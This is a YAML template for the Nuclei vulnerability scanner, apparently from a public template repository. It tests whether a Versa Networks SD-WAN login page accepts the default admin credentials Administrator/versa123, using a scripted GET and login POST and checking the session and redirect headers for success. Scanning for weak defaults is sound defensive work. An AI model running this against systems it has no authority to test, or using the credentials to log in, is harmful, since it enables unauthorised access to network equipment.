nuclei-templates/default-logins/versa/versa-default-login.yaml

id: versa-default-login

info:
  name: Versa Networks SD-WAN Application Default Login
  author: davidmckennirey
  severity: high
  description: Versa Networks SD-WAN application default admin credentials were discovered.
  reference:
    - https://versa-networks.com/products/sd-wan.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
  tags: default-login,versa,sdwan

requests:
  - raw:
      - |
        GET /versa/login.html HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate        

      - |
        POST /versa/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password={{pass}}&sso=systemRadio        

    attack: pitchfork
    payloads:
      user:
        - Administrator
      pass:
        - versa123

    cookie-reuse: true
    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 302'
          - "contains(tolower(all_headers_2), 'jsessionid')"
          - "contains(tolower(all_headers_2), 'location: /versa/index.html')"
        condition: and

      - type: dsl
        dsl:
          - "contains(tolower(all_headers_2), '/login?error=true')"
          - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
        negative: true

# Enhanced by mp on 2022/04/06